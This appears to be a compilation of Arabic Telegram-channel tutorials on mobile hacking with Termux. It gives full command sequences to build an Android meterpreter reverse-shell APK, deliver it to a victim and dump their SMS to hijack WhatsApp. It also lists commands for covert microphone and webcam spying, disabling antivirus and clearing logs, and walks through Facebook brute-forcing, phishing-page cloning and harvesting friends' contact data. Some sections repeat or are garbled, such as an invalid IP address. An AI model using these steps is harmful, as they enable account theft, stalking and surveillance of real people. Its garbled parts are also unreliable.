♦السلام عليكم ورحمه الله وبركاته♦

★شرح طريقه التخفي في النت وتغييرال IP عند اختراق اي شي*★

#الاوامر

→ pkg install tor

←الان امر التشغيل →

→ tor

←الان افتح صفحه جديده واخترق براحتك→


#ﺄلٳٰٰٰٰٰٰٰٰٰۚۚۚۙۚۚۚ­ٰٰٰٰٰٰۚۚۙﻣٰٰٰٰٰۚۚۚۚ­ٰٰٰٰۚۙﭖہٰٰٰۚۚږٱٰٰٰٰۚۚۚ­ٰٰٰہطہٰٛﹻﯞٰٛﹻٰر*➺

اخمط بذكر المصدر

@alambratwr_99

♦السلام عليكم ورحمه الله وبركاته♦

★شرح اختراق الواتس من termux ★

#الخطوه_الاولى تثبيت metasploit الي مثبته خلاص
✿
#الاوامر
✿

→ apt update && apt upgrade -y

→ apt install git

→ apt install python3

→ apt install python

→ apt install ruby

→ apt install wget

→ apt install unzip

→ apt install zip

→ apt install nano

→ apt install perl

→ apt install curl

→ apt install proot

→ wget https://Auxilus.github.io/metasploit.sh

→ ls

→ bash metasploit.sh

→ ls

→ cd metasploit-framework

→ ls

→ gem install bundle

→ gem install bundler

→ pip2 install bundler

→ bundle config build.nokogiri --use-system-libraries

→ bundle install

→ bundle update nokogiri

→ gem install nokogiri

→ gem install nokogiri -- --use-system-libraries

→ gem install pkg-config -v "~> 1.1"

→ pkg-config

→bundle update nokogiri

→ pg_ctl -D $PREFIX/var/lib/postgresql start

→ msfconsole

الان رح تشتغل الاداه بدون مشاكل

---------------------------------------------------------------


#الخطوة_الثانيه✿

♥تثبيت اداه ngrok لفتح البورتات♥

#الاوامر↓✿
✿
اول شي رح تسجل في هاذا الموقع↓✿
www.ngrok.com
بعدها رح تحصل كلمه linux arm دز عليها رح تتحمل معك اداه ngrok ملف مظغوط رح تنقله للذاكره الداخليه خارج مع الملفات
والان رح تنزلو تحت شوي في الموقع رح تحصلو رقم 3 وعليه رابط زي ذا↓✿
./ngrok authtokenyrifjgbhdjgnbvjgcbn_gfvhfhvcbgf

رح تنسخون واحتفظوا به لاننا رح نستخدمه على termux  ✿

#تابعوا #الاوامر

→ apt update && apt upgrade

→ cd /sdcard

→ ls

→ mv ngrok-stable-linux-arm.zip $HOME

→ cd

→ ls

→ unzip ngrok-stable-linux-arm.zip

→ rm -rif ngrok-stable-linux-arm.zip

→ ls

←الان رح تحط الرابط الي حصلتوه من الموقع وانتر

*الان رح نكتب امر تشغيل اداه نجروك بأمر↓

→ ./ngrok tcp 4444

★الان رح تفتح الاداه بدون*★


★********************************★


#الخطوه_الثالثه_الاخيره


¥الان رح تقلق كل نوافذ termux وتكتب هاي الاوامر بالترتيب↓

←افتح اداه ngrok ↓✿
ls

./ngrok tcp 4444

←الان رح تفتح نافذه جديده ورح تكتب اوامر صنع بايلود لاختراق الضحيه↓✿

♦اوامر صنع بايلود لاختراق الضحيه ↓✿

→ msfvenom -p android/meterpreter/reverse_tcp LHOST=★★★★★ LPORT=4444 R > /sdcard/termux.apk

¥رح تحط بدل ★★★★★ الip الخارجي الخاص بجهازك
لمعرفه الip الخارجي الخاص بك افتح نافذه جديده واكتب امر ifconfig ورح يطلع لك الip  اذا ماعرفتوا مكانه حمل برنامج fing ورح تحصلوه بسهوله بعد ماتحصله انسخه وحطه مكان★★★★★ #وحط_انتر

←واالان انتظروا لين مايخلص صنع البايلود بعد مايخلص رح تحصله في الذاكره الداخليه خارج مع الملفات بأسم termux ارسله للضحيه الي بدك تخترقه
بعد مايثبته بجواله ويفتح اكتبوا هاذي الاوامر بالترتيب↓

→ msfconsole
هاذا الامر لفتح اداه metasploit بعد ماتفتتح اكتبوا الاوامر هاذي↓↓

→ use exploit/multi/handler

→ set payload android/meterpreter/reverse_tcp

→ set lhost  رح تحط هنا الايبي

→ set lport هنا البورت الي فتحته باداه نجروك

→ exploit

→ الان رح تحملوا واتساب وتحطوا رقم الضحيه انتر بيوصله الكود عند الضحيه #اكتب هاي الاوامر لاختراق رسايل الضحيه ↓

→ dump_sms

←الان رح يطلع لكم ملف بصيغه txt فيها كل الرسائل الي عنده حط امر exit  وبعدها ls لاظهار الملفات بتحصل الرسائل في ملف txtلاظهار الرسايل الي في الملف ↓

←حط امر  cat 99999.txt

←غير كلمه.99999.txt اسم الملف الي رح يطلع لك بتحصل الكود الي وصله بتنسخه وتروح الواتس تكتبه ومبروك عليك الاختراقط

#ملاحظه تبقى اداه ngrok شغاله لاخر الاختراق

♥انشاء الله يكون الشرح واضح ♥

←الطريقه مضمونه ومجربه شخصيا→



#ﺄلٳٰٰٰٰٰٰٰٰٰۚۚۚۙۚۚۚ­ٰٰٰٰٰٰۚۚۙﻣٰٰٰٰٰۚۚۚۚ­ٰٰٰٰۚۙﭖہٰٰٰۚۚږٱٰٰٰٰۚۚۚ­ٰٰٰہطہٰٛﹻﯞٰٛﹻٰر*➺


اخمط بذكر المصدر

@alambratwr_99

#لاتغيروا_المصدر_ياعيالي

تثبيت ادة Spammer Grab

Installtion :

$ apt update

$ apt upgrade

$ apt install git

$ apt install python

$ apt install python2

$ git clone https://github.com/Noxturnix/Spammer-Grab

$ cd Spammer-Grab

$ chmod +x *

$ ./auto-install.sh

$ pip2 install -r requirements.txt


$ pyhton2 spammer.py
اخمط بذكر المصدر لٱ اسمح في تغير المصدر
@termux_alsharabi

اهم ادوات termux
[ 1 ] Install Admin-panel-finder
[ 2 ] Install Airgeddon
[ 3 ] Install Aircrack-ng
[ 4 ] Install AngryFuzzer
[ 5 ] Install Breacher
[ 6 ] Install Brutal
[ 7 ] Install BruteXSS
[ 8 ] Install Commix
[ 9 ] Install Cpscan
[ 10 ] Install credmap
[ 11 ] Install clang
[ 12 ] Install ExploitOnCLI
[ 13 ] Install Ezsploit
[ 14 ] Install Figlet
[ 15 ] Install PHP
[ 16 ] Install wget
[ 17 ] Install Hakku-Framework
[ 18 ] Install Hammer
[ 19 ] Install Hash-Buster
[ 20 ] Install Hydra
[ 21 ] Install Hunner
[ 22 ] Install Infoga
[ 23 ] Install Instahack
[ 24 ] Install Perl programming language
[ 25 ] Install IPGeoLocation
[ 26 ] Install kickthemout
[ 27 ] Install Trity
[ 28 ] Install Lazymux
[ 29 ] Install Metasploit-Framework
[ 30 ] Install nano editor
[ 31 ] Install netattack
[ 32 ] Install pydictor
[ 33 ] Install Nmap
[ 34 ] Install onioff
[ 35 ] Install A-Rat
[ 36 ] Install peepdf
[ 37 ] Install Python
[ 38 ] Install Python2
[ 39 ] Install Pybelt
[ 40 ] Install PyBozoCrack
[ 41 ] Install recon-ng
[ 42 ] Install ReconDog
[ 43 ] Install RED_HAWK
[ 44 ] Install Routersploit
[ 45 ] Install Ruby
[ 46 ] Install SCANNER-INURLBR
[ 47 ] Install social-engineer-toolkit
[ 48 ] Install SQLmap
[ 49 ] Install Squad
[ 50 ] Install sudo
[ 51 ] Install termux-fedora
[ 52 ] Install toilet txt
[ 53 ] Install Tor
[ 54 ] Install torshammer
[ 55 ] Install termux-lazysqlmap
[ 56 ] Install Facebook_Brute
[ 57 ] Install webscan
[ 58 ] Install webpwn3r
[ 59 ] Install weeman
[ 60 ] Install wfdroid-termux
[ 61 ] Install wifi-hacker
[ 62 ] Install slowloris
[ 63 ] Install w3m
[ 64 ] Install XPL-SEARCH
[ 65 ] Install Cupp
[ 66 ] Install FBUPv2.0
[ 67 ] Install Ubuntu
[ 68 ] Install D-TECT
[ 69 ] Install Wifite
[ 70 ] Install IP-Locator
[ 71 ] Install Fsociety
[ 72 ] Install WPSeku
[ 73 ] Install Arch Linux
[ 74 ] Install Vim editor
[ 75 ] Install Curl
[ 76 ] Install Blazy
[ 77 ] Install Crips
[ 78 ] Install Cyberscan
[ 79 ] Install Devsploit
[ 80 ] Install Dsvw
[ 81 ] Install Dsxs
[ 82 ] Install GoldenEye
[ 83 ] Install HatCloud
[ 84 ] Install Htools
[ 85 ] Install Hulk
[ 86 ] Install Netattack2
[ 87 ] Install Nikto
[ 88 ] Install PyBluez
[ 89 ] Install Shellstack
[ 90 ] Install Sn1per
[ 91 ] Install Socialfish
[ 92 ] Inatall Spammer-grab
[ 93 ] Install Txtool
[ 94 ] Install Wifresti
[ 95 ] Install XAttacker
[ 96 ] Install QRLJacking
[ 97 ] Install Santet-online
[ 98 ] Install Th3inspector
[ 99 ] Install Alpine Linux
[ 100 ] Install hacktronian
[ 101 ] Install Gasmask
[ 102 ] Install Dedsploit
[ 103 ] Install Cookie-stealer
[ 104 ] Install killchain
[ 105 ] Install Kali Linux
[ 106 ] Install sAINT
[ 107 ] Install Sqliv
[ 108 ] Install theHarvester
[ 109 ] Install trape
[ 110 ] Install uidsploit

للي م يعرف يحمل سكربتات
يكتب
git clone https://github.com/king-hacking/King-Hacking.git

وبعدها
cd King-Hacking
وبعدها
bash King-Hacking.sh

شرح تنصيب اداة Lazymux الرائعة فيها الكثير من الادوات المهمة التي تساعدنا في عملنا: الاومر المطلوبه :
1- pkg update
2- pkg install python
3- pkg install python2
4- pkg install git
5- git clone https://github.com/Gameye98/Lazymux.git
6- cd
7- ls
8- cd Lazymux 
9- ls
10- python2 lazymux.py 

تم تشغيل الاداه واذا اردت تثبيت اي اداه 
فقط كم بكتابة رقم الاداة واضغط Enter وانتظر قليلا:
وستقوم بي التثبيت التلقائي وشكرا للمتابعة..
#مقدم_سرمد_علي_كاظم
#اخمط_بذكر_المصدر

أوامر التحكم والتجسس في جهاز الضحية:
             --------------------------------------------
لأعادة تشغيل جهاز الضحية : reboot
------------------------------------------------------------
 لاطفاء جهاز الضحية : shutdown
------------------------------------------------------------
 لاضهار معلومات حول نضام الضحية مثل نضام تشغيل و لغة  : sysinfo
------------------------------------------------------------
 لألتقاط صورة من شاشة الضحية : screenshot
------------------------------------------------------------
 لاضهار اتصلات الشبكة وجميع البرامج و الملفات المتصلة بالانترنت و مستهلكة للانترنت : netstat
------------------------------------------------------------
 للدخول الي الملفات الداخليه و كتابة الاوامر كأنك في جهاز الضحية : shell
------------------------------------------------------------
لاقلاع اي برنامج علي جهاز الضحية بامر واحد منك : execute -f mc.apk
طبعا غير mc الي اسم البرنامج الذي تريده ان يشتغل 
------------------------------------------------------------
لاضهار جميع البرامج التي تشتغل في جهاز الضحية اكتب : ps
------------------------------------------------------------
 لرفع اي ملف من عندك الي جهاز الضحية : مثال : upload /sdcard/doda.apk \doda.apk
استبدل doda باسم الملف او التطبيق او اي شئ تريد رفعه
طبعا هذا بعد الدخول الي مكان التطبيق او الصوره او اي شئ وطبعا لدخول اللي ملفات الضحيه اطلب الامر
cd /sdcard
------------------------------------------------------------
 لتحميل اي ملف او صورة ... من جهاز الضحية الي جهازك : download doda.apk
غير doda الي اسم الملف و ايضا صيغة apk الي صيغة الملف
طبعا هذا بعد الدخول الي مكان التطبيق او الصوره او اي شئ وطبعا لدخول اللي ملفات الضحيه اطلب الامر
cd /sdcard
------------------------------------------------------------
اوامر مهمه
اولا هذا الامر
بعد دخولك مباشر علي الضحيه cd /sdcard
sdcard : هذا مكان الذاكره الداخليه
اما اذا طلبت cd /sdcard1
sdcard1: هذا مكان الذاكره الخارجيه
اما معني cd
هذا الامر للتنقل بين الملفات : cd
يمكنك ان تكتب  .. cd  للرجوع الي الوراء
وايضا للدخول لملف cd file للذهاب و تنقل الي ملف اخر
قم باستبدال file ب اسم الملف الذي تريد ذهاب اليه
اما هذا الامر pwd هذا يبين لك اسم المكان الذي تتواجد به من البدايه للنهايه
مثال ...\...\...\...\...\
وايضا هذا الامر ls يظهر لك الملفات الموجودة و اين انت
وايضا Ctrl+l هذا لمسح الكلام الذي يتواجد في الشاشه

------------------------------------------------------------
هذا الامر لحذف اي ملف : rm doda
قم باستبدال doda الي الملف او برنامج او صورة الذي تريد ان تحذفها
------------------------------------------------------------ 
لاغلاق الجلسة الاختراق لفترة معينة من الزمن طبعا هذا مهم حتي لا يشك الضحية ... : sleep 5
غير 5 الي عدد التواني التي تحب فيها غلق جلسة الاختراق يمكنك وضع ساعة عن طريق كتابة 3600
3600 تانية = ساعة و هكذا
------------------------------------------------------------
لمسح سجل الاحدات و الاختراق (تفيد في الحماية) : clearev
------------------------------------------------------------
هذا الامر مفيد جدا دوره تعطيل جميع مضادات الفيروسات في جهاز الضحية : run killav.rb
------------------------------------------------------------
للتجسس علي مايك mic  الخاص بالضحية و سماع كل ما يقوله الضحية و كل ما صوت في غرفته :
record_mic -d 5
غير 5 الي  عدد الـتاوني الذي تريد تسجيل الصوت فيها متلا 60 يسجل كل ما يقوله الضحية لمدة دقيقة
طبعا الزمن بالتانية s
------------------------------------------------------------
لالتقاط صورة من كاميرا الجهاز : webcam_snap
------------------------------------------------------------
لمشاهدة كل ما يفعله الضحية من الكاميرا اي التجسس علي الكاميرا : webcam_stream -d 60
غير 60 الي عدد التواني التي تسجل فيه الكاميرا
يمكنك وضع 3600 حيت يسجل كل ما يفعله الضحية لمدة ساعة
و ايضا سيفتح صفحة في متصفحك لرؤية كل ما يفعله
--------------------------------------------------------------
معلومه مهمه اذا حملت اي شئ من عند الضحيه سيكون متواجد في ملف اداه metasploit الذي متواجد في termux ويمكنك نقل كل شئ قمت بتحميله من ملف metasploit الي الذاكره الداخليه الخاصه بك بهذا الامر
mv doda /sdcard
غير اسم doda باسم الملف او البرنامج او الصوره او اي شئ قمت بتحميله
#للمزيد تابعنا @termuxx

شرح اختراق الفيسبوك بالتخمين

1 apt update

2 apt upgrade

3 apt install python

4 apt install python2

5 apt install git
6 git clone https://github.com/Gameye98/Lazymux.git

7 ls

8 cd Lazymux

9 ls

10 chmod 777 lazymux.py

11 python2 lazymux.py



اكتب رقم 3



اكبس 00





اكبس انتر 😕4






اكبس2



اي بس يخلص
اكتبls

☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆


افتح نافذة جديدة
واكتب ls

1 cd facebook-brute

2 ls


3 chomd +x facebook.py



4 python2 facebook.py



اكتب ID حساب الضحية 🙂 5 مثل10



6 password.txt
ويبدأ بالتخمين


اذكر المصدر @termuxx

اوامر الروت للترموكس termux

اعطاء صلاحيات الروت لبعض الادوات التي تحتاج روت

الاوامر

apt update

apt upgrade

pkg install git

pkg install ncurses-utils

git clone https://github.com/st42/termux-sudo

ls

cd termux-sudo

ls

cat sudo > /data/data/com.termux/files/usr/bin/sudo

chmod 700 /data/data/com.termux/files/usr/bin/sudo

sudo

#صقر_الهكر

موقع عرض معلومات الجهاز عبر رقم IMEI

https://www.imei.info

السلام عليكم ورحمة الله وبركاته
شرح جميع أوامر الميتا سبلويت

اليوم شرح جميل جداا للمبتدئين وهو عبارة عن مجموعة كبيرة من أوامر
MetaSploit

أترككم مع الأوامر
كود PHP:
show exploits
اظهار جميع ثغرات اداة الميتاسبلويت

كود PHP:
show payloads
اظهار جميع البايلود في مشروع الميتاسبلويت

كود PHP:
show auxiliary
يستخدم لاظهار ثغرات الفحص كـ فحص منافذ وبورتات مواقع و اجهزة ألخ

كود PHP:
show options
يستخدم لأظهار خيارات الثغرة المستخدمة

كود PHP:
use
يستخدم هذا الامر لأستخدام ثغرة ما كمثال .. use unix/***app/php_vbulletin_template

كود PHP:
set
يستخدم هذا الامر لتعديل خيارات ثغرة ما... انظر فوق ^_^ قلنا show options لأظهار خيارات الثغرة اما هنا لتعديل خيارات ثغرة ما او بالاصح ادخال الخيارات الى الثغرة من اي بي وبورت الى ما لذلك


مثال عليها .. من خيارات او شروط الثغرة ان تضع الاي بي المستهدف من موقع او جهاز وان تضع البروت ... يوجد غير هذان الخياران لكن هذا ليس موضوعنا وانما كيف التعديل على خيارات ثغرة ما ... الامر يكون هكذا
البورت المستهدف يرمز بهذا RPORT
بورت جهازنا لوصول التبليغ او اقصد بنجاح الثغرة والتحكم من جهازنا يرمز له LPORT
الاختلاف في كلمة L وكلمة R
عندما تشاهد هذه الرموز فوق تبدأ بـ L فأعلم انها تتكلم عنك واما اذا بدأت بـR فانها تتلكم عن الضحية
الامر يكون بالتعديل على خيارات الثغرة بهذا الامر
set RPORT 9999
هكذا بنكون عدلنا على الثغرة ووضعنا اي بي الهدف اما اذا قلنا كذا
set LHOST 129.168.1.100
كذا بنكون ادخلنا اي بي جهازنا في خيارات الثغرة لكي نتنصت عليه من النت كات او غيره
الان الاوامر جاهزة كذا

الآن لنفرض تريد اختيار بايلود معينة والنفرض بايلود الميتربريتر القوية .. ان شاء الله بنتطرق للبايلود وشرحها ووظيفتها واستعمالاتها

الان نرجع لموضوعنا ..يكون الامر هكذااا
set PAYLOAD windows/meterpreter/reverce_tcp


وبأمكانك تغيير البايلود التي واسمائها موجودة عن طريق الامر السابق
كود PHP:
show payloads
كود PHP:
show encoders
لأظهار ثغرات التشفير .. ليس هكس وانما تشفيرات من نوع قوي وفعال وايضا عن صنع اي بايلود فأنه يتم صناعته مشفر ولذلك ايضا يوجد هذه الانواع
encoders للتشفير اكثر واكثر
الشرح مقدم م̷ـــِْن صدام الشرعبي
@sadam_alsharabi
المصدر
@termux_alsharabi

استخدام Metasploit عن طريق Msfconsole

مقدمة
يتعبر Msfconsole هو الاشهر والاكثر استخدام في MSF. وهو يسمح با الوصل الوهمي الى كافة الخيارات المتوفرة في MSF. وعند استخدامك Msfconsole في البداية سوف تجد صعبوه في التعامل، لكن مع تعلم (syntax)تنفيذ الاومر سوف تقدر قوة هذة الواجهه.

فوائد msfconsole :
يدعم طريق الوصول الى معظم الخصائص المتوفرة في MSF.
يعتبر اكثر والواجهات استقراراً في الاستخدام.
يدعم التكملة التلقائية لتنفيذ الاوامر.
أمكانية تنفيذ يعض الاوامر الاضافية مثل (ping… وغيرها).
تشغيل (msfconsole):
بمكانك تشغيل msfconsole بكل سهوله بختيارة من القائمه في الباك تراك او بتنفيذ الامر في shell “./msfconsole” وبامكانك تمرير متغير “-h” لمشاهدة متغيرات خيارات الاستخدام.



المساعدة help:
قم بادخال الامر “help ” او “؟” وسوف تقوم بعرض العديد من الاوامر با الاضافة الى وصف لما تستخدم هذه الاوامر.

التكملة التلقائية :
صمم msfconsole ليكون سريع في الاستخدام واحد الخصائص التي تساعد في هذا الغرض هي التكلمة التلقائية(tab completion). مع وجود العديد من موديلز(modules)، يصعب عليك تذكراسم او مسار المديول(module) الذي تريد استخدامه.
وكما هو العادة في العديد من shells تقوم با الضغط على “tab” والذي سوف يقوم بعرض العديد من الخيارات او سوف يكمل تلقائياً اذا كان خيار واحد فقط .

use exploit/windows/dce
use .*netapi.*
set LHOST
set TARGET
set PAYLOAD windows/shell/
exp
show

أمر العودة الى الخلف (back):
عندما تنتهي من العمل مع موديل (module) معين او انك قد اخترت موديل(module) بالخطاء، في هذه الحالة تريد العودية الى الحالة السابقة لك، قم بادخال الامر “back” لكي تعودي الى ماقبل اختيارك.
msf auxiliary(ms09_001_write) > back
msf >



أمر الفحص (check) :
يقوم بفحص نظام الهدف هل هو مصاب با الاستغلال ام لا، قبل تنفيذ الاستغلال. وهذا الامر لايدعم العديد من الاستغلالات.
msf exploit(ms04_045_wins) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.1.114 yes The target address
RPORT 42 yes The target port
Exploit target:
Id Name
-- ----
0 Windows 2000 English
msf exploit(ms04_045_wins) > check
[-] Check failed: The connection was refused by the remote host
(192.168.1.114:42)



أمر الاتصال (connect):
هذا الامر يقوم بعمل شبية بعمل netcat وهو مبني ضمن msfconsole ويدعم SSL، proxies ،pivoting و ارسال الملفات. بتنفيذ الامر “connect” مع ايبي ادرس (IP Address ) و منفذ(Port)، وبمكانك الاتصال با الجهاز البعيد من خلال msfconsole مثل ماهو netcat او telnet.
msf > connect 192.168.1.1 23
[*] Connected to 192.168.1.1:23
DD-WRT v24 std (c) 2008 NewMedia-NET GmbH
Release: 07/27/08 (SVN revision: 10011)

DD-WRT login:

وبتمرير المتغير “-s” في الاتصال سوف يكون الاتصال عبر SSL.
msf > connect -s www.metasploit.com 443
[*] Connected to www.metasploit.com:443
GET / HTTP/1.0
HTTP/1.1 302 Found
Date: Sat, 25 Jul 2009 05:03:42 GMT
Server: Apache/2.2.11
Location: http://www.metasploit.org/



أمر ((exploit مقابل (run) :
عندما يتم تنفيذ اي إستغلال يكون بتنفيذ امر “exploit”، بينما عندما تستخدم auxiliary module يكون الانسب بتنفيذها من خلال الامر “run”. وايضا يمكنك استخدام امر “exploit”.
msf auxiliary(ms09_001_write) > run
Attempting to crash the remote host...
datalenlow=65535 dataoffset=65535 fillersize=72
rescue
datalenlow=55535 dataoffset=65535 fillersize=72
rescue
datalenlow=45535 dataoffset=65535 fillersize=72
rescue
datalenlow=35535 dataoffset=65535 fillersize=72
rescue
...بقية النتائج...



أمر (irb) :
بتنفيذ هذا الامر تقوم با الدخول على سكربت لغة الروبي وتستطيع تنفيذ اوامر الروبي مباشرة من msfconsole، وهذه الميزة مفيدة جداً حيث تساعدك على فهم Framework.
msf > irb
[*] Starting IRB shell...
>> puts "Hello, Fayez!"
Hello, Fayez!
>> Framework::Version
=> "3.7.0-release"

أمر (jobs) :
يقوم بعرض وإدارة المديول(modules) التي تشتغل في الخلفية(Background). وبتنفيذ امر “jobs” يكون بمكانك عرض وإنها
هذه الاعمل(jobs).

msf exploit(ms08_067_netapi) > jobs -h
Usage: jobs [options]

Active job manipulation and interaction.

OPTIONS:

.-K Terminate all running jobs
. -h Help banner
-i Lists detailed information about a running job.
-k Terminate the specified job name.
-l List all running jobs.
-v Print more detailed info. Use with -i and –l.



أمر (load/unload):
بتنفيذ أمر لود “load” متبوع بـاسم إضافة(plugin)

اداة weeman لإنشاء صفحات مزورة من @termuxx

apt update

apt upgrade

apt install python

apt install python2

apt install git

امر تثبيت الأداة 👇👇👇
git clone https://github.com/evait-security/weeman

امر تشغيل الأداة بعد تثبيتها
cd weeman

امر اعطاء صلاحيات الاداة
chmod +x weeman.py

امر فتح الاداة
python2 weeman.py

وتكتب امر set url ورابط الموقع يلي بدك تعمل الصفحة المزورة عليه

مثال
set url www.facebook.com

set action_secruty وهون نفس الموقع

مثال
set action_secruty www.facebook.com

set action_secruty url وتكتب نفس الموقع يلي رح تعمل عليه الصفحة المزورة

مثال
set action_secruty url www.facebook.com


بس تكتبهم اكتب امر
run
وانتظر شوي حتى يخلص تحميل
ورح يعطيك رابط الصفحة المزورة

اسرق بذكر المصدر 😒
t.me/termuxx
t.me/termuux
#صقر_الهكر

اداة weeman لإنشاء صفحات مزورة من @termuxx

apt update

apt upgrade

apt install python

apt install python2

apt install git

امر تثبيت الأداة 👇👇👇
git clone https://github.com/evait-security/weeman

امر تشغيل الأداة بعد تثبيتها
cd weeman

امر اعطاء صلاحيات الاداة
chmod +x weeman.py

امر فتح الاداة
python2 weeman.py

وتكتب امر set url ورابط الموقع يلي بدك تعمل الصفحة المزورة عليه

مثال
set url www.facebook.com

set action_secruty وهون نفس الموقع

مثال
set action_secruty www.facebook.com

set action_secruty url وتكتب نفس الموقع يلي رح تعمل عليه الصفحة المزورة

مثال
set action_secruty url www.facebook.com


بس تكتبهم اكتب امر
run
وانتظر شوي حتى يخلص تحميل
ورح يعطيك رابط الصفحة المزورة

اسرق بذكر المصدر 😒
t.me/termuxx
t.me/termuux
#صقر_الهكر

__________________
اولا عمل بايلود msfvenom -p android/meterpreter/reverse_tcp LHOST=10.85.152.43.100 LPORT=4040 R > /Desktop/termux.apk ----------------------------------------------------------------- ثانيا امر فتح اداه MetaSploit msfconsole ----------------------------------------------------------------- ثالثا بعد الدخول علي اداه MetaSploit
$ use exploit/multi/handler $ set payload android/meterpreter/reverse_tcp
$ set lhost ......
$ set lport .......
$ run
$ help $ shell $ cd /sdcard $ ls ----------------------------------------------------------------- رابعا اوامر التحكم في الضحيه لأعادة تشغيل جهاز الضحية : reboot ------------------------------------------------------------ لاطفاء جهاز الضحية : shutdown ------------------------------------------------------------ لاضهار معلومات حول نضام الضحية مثل نضام تشغيل و لغة : sysinfo ------------------------------------------------------------ لألتقاط صورة من شاشة الضحية : screenshot ----------run

$ help

1. $ shell

$ cd /sdcard

$ ls
-----------------------------------------------------------------
رابعا اوامر التحكم في الضحيه

لأعادة تشغيل جهاز الضحية : reboot
------------------------------------------------------------
لاطفاء جهاز الضحية : shutdown
------------------------------------------------------------
لاضهار معلومات حول نضام الضحية مثل نضام تشغيل و لغة : sysinfo

اشهر مواقع الديب 👆👆

اداة OSIF
تقوم بجمع معلومات الضحيه على فيسبوك لتساعدك على الاختراق

طريقة تثبيت الاداة
تدخل ل @termuxx وتكتب الاوامر

‏pkg install python2-dev python2 git -y

وبعدها

‏git clone https://github.com/ciku370/OSIF

وبعدها

‏cd OSIF

‏pip2 install -r requirements.txt

‏chmod +x osif.py

‏python2 osif.py

الان ستعمل الاداة

بعدها سنكتب هذا الامر لتجسيل حساب فيسبوك الخاص بنا

‏token

وبعدها سيطلب منا الايميل والباسوورد نكتبهن

بعد التسجيل بحسابك الخاص
سنكتب هذا الامر

‏get_data

والان اذا كنت تريد جمع معلومات اي شخص على فيسبوك ويجب ان يكون صديقك

نكتب هذا الامر

‏get_info

وبعدها سيطلب منك id الضحيه



وهذا الأمر يقوم بجمع جميع ارقام هواتف اصدقائك على فيسبوك

‏dump_phone

وسيقوم بجمع جميع ارقام هواتف اصدقائك ووضعهن في ملف txt بمجلد osif

ونفس الطريقة اذا كنت تريد جمع ايميلات اصدقائك على الفيسبوك

تكتب هذا الامر
‏dump_mail

اداه لاختراق الاجهزه المتصله على الشبكه من الاندرويد ((routersploit/termux))


لتثبيت الاداه
git clone https://www.github.com/threat9/routersploit
تم تثبيت الاداه
..............................................................................
للدخول للاداه
cd
ls
cd routersploit
ls
تم الدخول داخل مجلد الاداه
..............................................................................
يجب اعطاء صلاحيه للملفات الاتيه
chmod +x LICENSE
chmod +x Makefile
تم اعطاء الصلاحيه للملفات
..............................................................................
لعمل الاداه بصورة صحيحعه يجب عليك اعطاء امر
pip2 install -r requirements-dev.txt
pip2 install -r requirements.txt
pip2 install requests
pip install future
pip install --upgrade pip
تم
..............................................................................
لتشغيل الاداة
./rsf.py
تم تشغيل الاداه

شرح استغلال ثغرة SS7
شرح بسيط
شرح اليوم عن اختراق ال IPhone عن طريق metasploit نقوم بالدخول الأداة ونكتب الاوامر التالية :



msf> use exploit/apple_ios/browser/safari_libtiff
set Exit0nsession felas
/set uripath
run


سيظهر رابط بجانب عبارة local ip بصيغة http تقوم بنسخة وارسالها للضحية وبعد ذلك تبدأ جلسة التنسط
شكرا للمتابعة

♦السلام عليكم ورحمه الله وبركاته♦

★شرح اختراق الواتس من termux ★

#الخطوه_الاولى تثبيت metasploit الي مثبته خلاص
✿
#الاوامر
✿

→ apt update && apt upgrade -y

→ apt install git

→ apt install python3

→ apt install python

→ apt install ruby

→ apt install wget

→ apt install unzip

→ apt install zip

→ apt install nano

→ apt install perl

→ apt install curl

→ apt install proot

→ wget https://Auxilus.github.io/metasploit.sh

→ ls

→ bash metasploit.sh

→ ls

→ cd metasploit-framework

→ ls

→ gem install bundle

→ gem install bundler

→ pip2 install bundler

→ bundle config build.nokogiri --use-system-libraries

→ bundle install

→ bundle update nokogiri

→ gem install nokogiri

→ gem install nokogiri -- --use-system-libraries

→ gem install pkg-config -v "~> 1.1"

→ pkg-config

→bundle update nokogiri

→ pg_ctl -D $PREFIX/var/lib/postgresql start

→ msfconsole

الان رح تشتغل الاداه بدون مشاكل

---------------------------------------------------------------


#الخطوة_الثانيه✿

♥تثبيت اداه ngrok لفتح البورتات♥

#الاوامر↓✿
✿
اول شي رح تسجل في هاذا الموقع↓✿
www.ngrok.com
بعدها رح تحصل كلمه linux arm دز عليها رح تتحمل معك اداه ngrok ملف مظغوط رح تنقله للذاكره الداخليه خارج مع الملفات
والان رح تنزلو تحت شوي في الموقع رح تحصلو رقم 3 وعليه رابط زي ذا↓✿
./ngrok authtokenyrifjgbhdjgnbvjgcbn_gfvhfhvcbgf

رح تنسخون واحتفظوا به لاننا رح نستخدمه على termux ✿

#تابعوا #الاوامر

→ apt update && apt upgrade

→ cd /sdcard

→ ls

→ mv ngrok-stable-linux-arm.zip $HOME

→ cd

→ ls

→ unzip ngrok-stable-linux-arm.zip

→ rm -rif ngrok-stable-linux-arm.zip

→ ls

←الان رح تحط الرابط الي حصلتوه من الموقع وانتر

*الان رح نكتب امر تشغيل اداه نجروك بأمر↓

→ ./ngrok tcp 4444

★الان رح تفتح الاداه بدون*★


★********************************★


#الخطوه_الثالثه_الاخيره


¥الان رح تقلق كل نوافذ termux وتكتب هاي الاوامر بالترتيب↓

←افتح اداه ngrok ↓✿
ls

./ngrok tcp 4444

←الان رح تفتح نافذه جديده ورح تكتب اوامر صنع بايلود لاختراق الضحيه↓✿

♦اوامر صنع بايلود لاختراق الضحيه ↓✿

→ msfvenom -p android/meterpreter/reverse_tcp LHOST=★★★★★ LPORT=4444 R > /sdcard/termux.apk

¥رح تحط بدل ★★★★★ الip الخارجي الخاص بجهازك
لمعرفه الip الخارجي الخاص بك افتح نافذه جديده واكتب امر ifconfig ورح يطلع لك الip اذا ماعرفتوا مكانه حمل برنامج fing ورح تحصلوه بسهوله بعد ماتحصله انسخه وحطه مكان★★★★★ #وحط_انتر

←واالان انتظروا لين مايخلص صنع البايلود بعد مايخلص رح تحصله في الذاكره الداخليه خارج مع الملفات بأسم termux ارسله للضحيه الي بدك تخترقه
بعد مايثبته بجواله ويفتح اكتبوا هاذي الاوامر بالترتيب↓

→ msfconsole
هاذا الامر لفتح اداه metasploit بعد ماتفتتح اكتبوا الاوامر هاذي↓↓

→ use exploit/multi/handler

→ set payload android/meterpreter/reverse_tcp

→ set lhost رح تحط هنا الايبي

→ set lport هنا البورت الي فتحته باداه نجروك

→ exploit

